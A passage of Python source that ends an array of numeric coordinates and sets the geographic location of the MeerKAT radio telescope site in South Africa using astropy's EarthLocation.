        -3236139.97163011, -3236636.20942028, -3238301.70200615,
        -3240542.58734053, -3240956.88531359, -3241111.82913216,
        -3240538.85373571]])
        # Geographic location of the MeerKAT site (Karoo, South Africa).
        self.Loc=EarthLocation(
                lat=-30.83 * u.deg,
                lon=21.33 * u.deg,
                height=1195. * u.m
        )
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.